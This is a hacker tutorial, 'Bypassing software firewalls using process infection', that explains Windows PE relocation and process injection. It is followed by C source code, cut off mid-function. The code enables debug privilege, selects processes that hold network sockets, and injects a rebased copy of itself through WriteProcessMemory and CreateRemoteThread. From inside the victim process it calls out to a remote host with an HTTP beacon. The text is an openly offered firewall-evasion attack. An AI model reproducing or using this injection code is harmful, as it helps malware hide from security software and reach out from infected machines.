Bypassing software firewalls using process
infection
Introduction
Before we start; as most of you know, this article will probably (and probably should
be) overshadowed by rattle�s article
of the same title ( http://www.phrack.org/show.php?p=62&a=13
). The reason I have chosen to recreate it, is firstly because a lot of people
have found it difficult to comprehend, and secondly I�ve come across some
improvements of my own, worth adding.
It seems most of the issue is with the use of relocatable assembly code � while
this is all 1337, all the same reasons for not using it pop up. Most of us sort
of learn to read/write it, but it�s never been as clear or expandable as a HLL. With
some neat tricks �
the computing underworld has circumvented such an issue. I�ll try
to explain it, as you guys (and I) can understand it.
A quick walkthrough of things you’ll probably need to know
Like I said, a quick walkthrough, there is probably gigabytes of this crap on
the interweb. It applies to win32 as it is now and probably modern memory management
across most OS�s.
If you are a cool cat you can probably just use this for reference.
Processes in memory
Processes are (virtual) address spaces that have executable code (that may or
may not be currently executed). Modules are executables or libraries loaded
into this address space � basically anything in PE format. Threads are a way
to split execution of a process
into parallel streams of instructions � usually independent of each
other.
There are 4 types of address that exist � and we will only ever see 3 of
them. The first is an actual physical address � we can forget about this one, our operating
system handles it. The second is an absolute address (as defined in a process
space) that references a tangible address in that particular process
space. That is; we don�t
need to do anything to it to make it point in the correct place. The third is a
virtual address �
this doesn�t
really exist, only to make our lives easier. It will point (an absolute
address) to the base of the current module, which is how we
can calculate the absolute address of a RVA. A relative virtual address (or
RVA) is defined as the absolute address minus the virtual address. If this
sounds a little complicated, it is. I like to think of RVA as Relative _to_
_the_ Virtual Address. The goal of RVA�s is to avoid hard coded
addresses �
or at least minimise their irreparable use. This brings us onto why we need
them �
and the windows
loader.
The
windows loader
The
windows loader has a simple purpose; it must fetch the file off the disk and
make it work in memory. This sounds pretty simple, and it most cases it is. Its
first step is to create the space and put the primary module (usually the
executable you click) into memory. It then looks for any dependencies this
executable has �
libraries it needs like ws2_32.dll and probably/definitely kernel32.dll.
Modules have preferred load addresses, and at the start all their in code
addresses will be absolute (or hard
coded) addresses relative to this fact. So what happens if there is a
collision? Well bummer, it needs to go somewhere else. This means that all hard
coded addresses need to be changed, which is easy because (after ripping it off
COFF) PE format has a section usually called .reloc which contains RVA�s to hard
coded addresses that need to be changed in event of collision. Now the reason
executables usually have this stripped is that they are always loaded first,
and so, certain to get their preferred load address. This is why dll injection
works. The loadlibrary call, pushes the
windows loader to sort out the modules code, most likely using the .reloc table
in the process.
Therefore our goal is basically to emulate the windows loader,
in order to execute our module in another process space. It�s
important to note, this isn�t _all_ the
windows loader does, but it�s what is important to us for this article.
Brief PE format
Now this will be really brief, it would be really quite easy to waffle on into
irrelevancy on this subject. To gain a (more) complete overview of PE format (and
some other neat stuff) you should check the URLs/references for Matt Petrieks article(s)
on PE format.
The first structure is an IMAGE_DOS_HEADER. This has little interest to us � other
than it has a pointer (a RVA) to the IMAGE_NT_HEADERS structure. This is
important because we need to jump over a small stub program to tell DOS users
to get with the freekin� times. The IMAGE_NT_HEADERS structure is plural for
a reason �
it actually contains pointers to two other structures, the IMAGE_FILE_HEADER
which we won�t
really need, and the IMAGE_OPTIONAL_HEADER structure (which isn�t
optional.) The IMAGE_OPTIONAL_HEADER has lots of pretty stuff in it, including
the data directory. If you need to check if you�re in the right place �
IMAGE_NT_HEADERS also has a member called Signature, which should always be �PE\0\0�.
The data directory is what we need to find first. It is an array of 16
IMAGE_DATA_DIRECTORY structures, and contains addresses (RVAs) to each section
in the PE file. Sections can contain code, relocations, resources and almost
anything you can imagine. In short we need to find the .reloc section, we do
this by using a predefined index called IMAGE_DIRECTORY_BASERELOC (or 5). From
this we
can get to the .reloc (or the base relocations) section (remember not all
executables have this! You�ll need to get your compiler to output it. (MSVC -
pass /fixed:no in the linker switches))
This brings us to the base relocations section. The base relocations section is
set like this: A series of blocks that correspond to pages in memory. These
blocks are comprised of each memory location that needs to be altered. We
calculate the change ourselves :).
How software
firewalls work
Software
firewalls work by hooking API calls, usually as a driver. They then dictate who
and who shall not be permitted to use them, usually by some use of checksums and
tables of who the user has allowed.
Our idea is to �hide� in
another processes space that has the privileges to access the internet, which
in turn allows us to bypass the firewall. The act of injecting your code into
another process�s
address space is called process
infection (hence the title :). This usually happens without the application(s)
knowing they have been infected.
Process
infection without external dll or 1337 code
Right so, down to the mechanics. I�ve split this up into stages, partly because it
makes it easier, and partly because it just divides up nicely. (As quick
reviser of what we�re
doing; we want to put our code in another process, and fix up all hard
coded addresses using the .reloc section.)
First
We need to get some space (anywhere we
can, it doesn�t
matter) in the other process.
This is quite a complicated issue; as it appears only partially abstracted by
windows but, well whatever we need to do it anyway. We can allocate
ourselves a series of pages (if you don�t know what pages are, don�t
worry. It�s
just memory to you
and me) using the VirtualAllocEx() API. This takes 5 arguments, most
of which I�ll
assume you understand, or can understand from the manual on msdn.microsoft.com. Points that are
specifically important to us are; passing NULL as the specified address (this
allocates us memory anywhere it�s available) and the protection values/reservation
type. The protection values should be set to PAGE_EXECUTE_READWRITE which
allows us to do everything we want, and the reservation (or allocation) type
needs to be MEM_COMIT | MEM_RESERVE.
The value that we are returned will be the address will be the new base for our
module. We must convert all absolute addresses to represent that fact, that�s a
catch to remember, as things become a little complicated dealing with multiple
regions of memory.
Second
For this bit we�ll
need to know the size of our module (or the module to be injected). This can
either be found using some of the module enumeration APIs or by traversing our
own IMAGE_NT_HEADERS struct, finding the SizeOfImage member in the
IMAGE_OPTIONAL_HEADER struct. With this we need to make a copy of ourselves, so
we don�t
damage our own execution. To allocate memory, I like to use HeapAlloc(), if
only for the reason there is an option to complain on error. Now you�d
better CopyMemory() our module memory over into our newly allocated region :)
This location is the location the module that needs to be changed is at, but it
is _not_ the address it needs to be rebased as, which is the address above.
Third
This is where the actual rebasing procedure begins and ends. To find the .reloc
section, (I�ve
briefly covered this before, but here it is more programmatically), we need to;
Find the DOS header. This is the base of the module (that we copied). From
this, get �lfanew�
(which is an RVA) and add it to the base of the module to get a pointer to the
NT headers. The source code has a handy macro (which has been abused so much I
don�t
know who to accredit it to) for adding an integer to pointers without
interference.
The absolute address of the .reloc table can then be found via the
IMAGE_OPTIONAL_HEADER/DataDirectory structure(s). Somewhat like this
OP_HEADER.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress plus
the absolute address of the copied module. And yes, it is an RVA. not _the_
virtual address. Grunt.
The size of this section is also included in the same place, which is useful
because we�ll
need to iterate through the blocks. For each block, the entries are words. The
upper 4 bits indicate the type of relocation, which will be either
IMAGE_REL_BASED_ABSOLUTE or IMAGE_REL_BASED_HIGHLOW. Ignore
IMAGE_REL_BASED_ABSOLUTE as it is used as padding. The lower 12 bits are an
offset from the section virtual address (as above) to the hard coded address.
To calculate exactly how much you need to add (otherwise known as the delta) to
the hard coded address, subtract the preferred image base from the actual new
address for the module. Add the delta to the area pointed to by the above
offset from the section�s (relative) virtual address. Continue this until
you have looped through all the blocks. I think the source code shows this a
little better than my fumbling English. :)
And finally
Write the rebased module to the other address space using WriteProcessMemory().
After this, all that needs to be done is call CreateRemoteThread() (you should
also be able to manipulate the thread context if CreateRemoteThread() is
hooked) on the new module, the entry point can be a (rebased) address from your
module, or the EntryPoint member in the optional header. Gold! (quite a lot of
debugging later!)
Known Issues
Well with the correct permissions this idea will be able to infect any process,
however; we�re
not completely correctly emulating the windows loader. No doubt many tasks are
performed by it that at this stage, that we just don�t need to emulate. For
example, the IAT could contain the wrong addresses if libraries have been
loaded in different places, possibly causing an unidentified catastrophic error
on runtime. Fix that with your own black magic :)
Beating hooks on CreateProcess(), and a different method of finding trusted
processes
Many firewalls today hook CreateProcess(), these catch out rattle�s
original method of launching an invisible browser to communicate. My method
involves reading active TCP connections; and the processes that host them. If
we find one, we jack it.
We could do this by calling the GetExtendedTcpTable() API with AF_INET as the �ulAf�
indicating that we would like only IPv4 connections, and
TCP_TABLE_OWNER_PID_CONNECTIONS as the tableclass. This should give us a list
of active connections along with their owning pids to infect. If for any reason
this should fail, we can simply move onto the next one in the list. It sounds
simple enough, the trouble is; GetExtendedTcpTable (according to its documentation)
was only just included in XP sp2. Other similar functions we�re
only just included in XP. Our search for gingerbread missionaries continues.
After digging around, I can�t find a documented way for uncovering network
connections pre-XP. I have found however, that using NtQuerySystemInformation()
along with some undocumented stuff, we can enumerate all open handles in the
system. We can then bring the handles
into our address space using DuplicateHandle(), and so query their information
(namely the device they are using) using NtQueryObject(). We
can then filter for handles using �\Device\Tcp�. At this point we could go
further and query the device for information such as connection endpoints,
connection states and port numbers. I feel that this would just further
complicate an issue already far too complex � if they have an open handle to
a socket, and we can read it, I assume that they are a viable target. To combat
the idea that well, man down, my code includes some �continue until you�re
safely there�
features, that, well, you�re all intelligent to understand and enjoy without
me talking about it.
Conclusion
This method is different to most I�ve seen around. At this point, if English were not
my native language, I would be making some excuses for any inadequacies in the
way I have written. But it is, so check the source code for anywhere you get
lost. I�ve
tried to keep it commented, in the hope it might catch on.
Vale!
Source code
/* MAIN.C ---------------------*/
/* contains WinMain, base of app */
#include <windows.h>
#include <winsock.h>
#include "dmode.c"
#include "pInject.c"
#include "FindSocketHandles.c"
unsigned long InjectedFuncState; // global to notify the process injector of the injector func state
unsigned long LastEntryInjected = 0;
#define FUNC_INCOMPLETE 1 // a list of states InjectedFuncState can be
#define FUNC_SUCCESS 0
#define FUNC_FAILURE -1
#define FUNC_CONNECT_FAILURE -2 // important enough for its own code
/* some crap for our injected function */
typedef int (WINAPI *WSASTRT)
(WORD, LPWSADATA);
typedef SOCKET (WINAPI *SOKT)
(int, int, int);
typedef unsigned long (WINAPI *INET_ADR)
( const char* );
typedef unsigned short (WINAPI *HTNS)
( unsigned short );
typedef int (WINAPI *CNNCT)
(SOCKET, const struct sockaddr*, int);
typedef int (WINAPI *SND)
(SOCKET, const char*, int, int);
typedef int (WINAPI *CLSE_SCK)
(SOCKET);
typedef int (WINAPI *WSACLEAN)
();
/* more precisely crap so we can dynamically load winsock */
#define WSK_SENDSTR "GET /scripts/index.php?scan=hello%20from%20me HTTP/1.0\nFrom: Darth_Vader\nUser-Agent: Force/1.0\n\n"
int InjectedMeat(LPARAM lParam)
{
// we can make any in-modular calls in the other process space here
// beware of inter-modular calls, as they may have been located in different
// places. this is why i've loaded winsock dynamically
HMODULE hWinsock2;
SOCKET mySock;
WSADATA wsa_data;
struct sockaddr_in RemoteAddrInfo;
WSASTRT MyWSAStartup;
SOKT MySocket;
INET_ADR MyInetAddr;
HTNS MyHtons;
CNNCT MyConnect;
SND MySend;
CLSE_SCK MyCloseSocket;
WSACLEAN MyWSACleanup;
InjectedFuncState = FUNC_INCOMPLETE;
hWinsock2 = LoadLibrary("ws2_32.dll");
if (hWinsock2==NULL)
{ InjectedFuncState = FUNC_FAILURE; ExitThread(-1); }
// at this point we assume it is all there, expect to die horribly if not
MyWSAStartup = (WSASTRT)GetProcAddress(hWinsock2, "WSAStartup");
MySocket = (SOKT)GetProcAddress(hWinsock2, "socket");
MyInetAddr = (INET_ADR)GetProcAddress(hWinsock2, "inet_addr");
MyHtons = (HTNS)GetProcAddress(hWinsock2, "htons");
MyConnect = (CNNCT)GetProcAddress(hWinsock2, "connect");
MySend = (SND)GetProcAddress(hWinsock2, "send");
MyCloseSocket = (CLSE_SCK)GetProcAddress(hWinsock2, "closesocket");
MyWSACleanup = (WSACLEAN)GetProcAddress(hWinsock2, "WSACleanup");
if(MyWSAStartup(MAKEWORD(2,0), &wsa_data)!=0)
{
InjectedFuncState = FUNC_FAILURE;
WinMain(NULL, NULL, NULL, 0);
ExitThread(0);
}
mySock = MySocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(mySock==INVALID_SOCKET)
{
InjectedFuncState = FUNC_FAILURE;
WinMain(NULL, NULL, NULL, 0);
ExitThread(-1);
}
ZeroMemory(&RemoteAddrInfo, sizeof(struct sockaddr_in));
RemoteAddrInfo.sin_family = AF_INET;
RemoteAddrInfo.sin_addr.s_addr = MyInetAddr("192.168.0.2");
RemoteAddrInfo.sin_port = MyHtons(80);
if(MyConnect(mySock, (struct sockaddr *) &RemoteAddrInfo, sizeof(RemoteAddrInfo)) < 0)
{
InjectedFuncState = FUNC_CONNECT_FAILURE;
WinMain(NULL, NULL, NULL, 0);
ExitThread(-1);
}
MySend(mySock, WSK_SENDSTR, strlen(WSK_SENDSTR), 0);
MyCloseSocket(mySock);
MyWSACleanup(&wsa_data);
InjectedFuncState = FUNC_SUCCESS;
ExitThread(0);
return 0;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nShowCmd)
{
int ret;
DWORD cbNeeded, dwRandIndex;
POPEN_SOCK_HANDLE_INFO_EX pOSHIEx;
char debugout[255];
pOSHIEx = malloc(1);
DebugMode(TRUE); //checking
FindPIDsWithSocketHandles(pOSHIEx, 1, &cbNeeded);
// sorry about the names here people, i kind of ran out of inspiration
pOSHIEx = realloc(pOSHIEx, cbNeeded);
// should probably check these
FindPIDsWithSocketHandles(pOSHIEx, cbNeeded, &cbNeeded);
// don't pass null for that last param, you'll probably crash 'n' burn
// note: you can check the return values here
// anything positive is a success - the number above zero indicates warnings
dwRandIndex = 1 + LastEntryInjected;
if (dwRandIndex > pOSHIEx->NumberOfEntries-1)
{
//we've probably used all our processes
MessageBox(NULL, "CatastrophicError!", "PJECT", MB_ICONWARNING); //
ExitThread(0);
}
LastEntryInjected++;
sprintf(debugout, "injecting pid %d from %d poss", pOSHIEx->OpenSockHandleInfo[dwRandIndex].dwPid, pOSHIEx->NumberOfEntries);
MessageBox(NULL, debugout, "INFO", MB_OK);
ret = pInject(GetModuleHandle(NULL), pOSHIEx->OpenSockHandleInfo[dwRandIndex].dwPid, &InjectedMeat, GetCurrentProcessId());
switch (ret)
{
case PINJECT_MEM_ERR:
MessageBox(NULL, "THERE WAS A MEMORY ERROR", "FUCK", MB_OK);
break;
case PINJECT_RELOC_ERR:
MessageBox(NULL, "THERE WAS A RELOC ERROR", "FUCK", MB_OK);
break;
case PINJECT_PROC_ACCESS_ERR:
MessageBox(NULL, "THERE WAS A PROCESS ACCESS ERROR", "FUCK", MB_OK);
break;
case PINJECT_NO_RELOC:
MessageBox(NULL, "YOU IDIOT. NO RELOC TABLE", "FUCK", MB_OK);
}
return 0;
}
/* dmode.c ---------------- */
/* contains DebugMode() to activate the debug privilege */
#ifndef SUCCESS
#define SUCCESS 0
#endif
#ifndef FAILURE
#define FAILURE 1
#endif
// DebugMode (BOOL)
// with occasionally a tongue in cheek reference as god mode�=)
// activates the debug mode for the current process
// requires the privilege to be 'ENABLED'
// returns FAILURE on failure, and SUCCESS on success
int DebugMode(BOOL bToggle)
{
HANDLE hToken;
DWORD cbTokPriv = sizeof(TOKEN_PRIVILEGES);
static TOKEN_PRIVILEGES tpGodModeActivated, tpOriginalMode;
if (bToggle)
{
tpGodModeActivated.PrivilegeCount = 1;
tpGodModeActivated.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tpGodModeActivated.Privileges[0].Luid);
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken) )
{
return FAILURE;
}
if (!AdjustTokenPrivileges(hToken, FALSE, &tpGodModeActivated, sizeof(tpGodModeActivated),
&tpOriginalMode, &cbTokPriv) != ERROR_SUCCESS)
{
CloseHandle(hToken);
return FAILURE;
}
CloseHandle(hToken);
}
else {
if (! OpenProcessToken(GetCurrentProcess(),
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken) )
{
return FAILURE;
}
if (AdjustTokenPrivileges(hToken, FALSE, &tpOriginalMode, sizeof(tpOriginalMode), NULL, NULL)
!= ERROR_SUCCESS)
{
CloseHandle(hToken);
return FAILURE;
}
}
return SUCCESS;
}
/* pInject.c ---------------- */
/* functions related to process injection */
// pInject;
// contains functions related to process injection
// namely pInject ( DWORD dwPid, void* startAddress, DWORD dwAdditionalInfo)
// startAddress. Now that's a tough one !
// we will need to rebase that as well
// TODO:
// also fix IAT and other issues with relocatable code
// not a problem unless dlls are loaded in different places to in our address space
// if this is a problem (and this code hasn't been updated. now=9/6/2006)
// use GetProcAddress (assuming that's in the right place!)
#define PINJECT_SUCCESS 0
#define PINJECT_MEM_ERR -1
#define PINJECT_RELOC_ERR -2
#define PINJECT_PROC_ACCESS_ERR -3
#define PINJECT_NO_RELOC -4
#define MakePtr( cast, ptr, addValue ) (cast)( (DWORD)(ptr) + (addValue) )
// http://www.codeproject.com/dll/DLL_Injection_tutorial.asp
// actually from a book by matt pietrek and whored out over the internet
int pInject(HANDLE hModule, DWORD dwInPid, void* pStartAddr, DWORD dwParam)
{
HANDLE hOtherProcess;
void *pNewModule, *pModuleAsData, *pBaseForRVA;
WORD *wRelocRVAs;
PIMAGE_DOS_HEADER pDOSHeader;
PIMAGE_NT_HEADERS pNTHeader;
PIMAGE_BASE_RELOCATION pBaseReloc;
unsigned int i=0, j=0, nRelCount=0, offset;
DWORD dwModSiz, dwWritten=0, dwMemDelta, dwBaseRelocSiz, *pAbsoluteRelocAddr, dwRelocSecOffset;
// open the process
hOtherProcess = OpenProcess(PROCESS_ALL_ACCESS,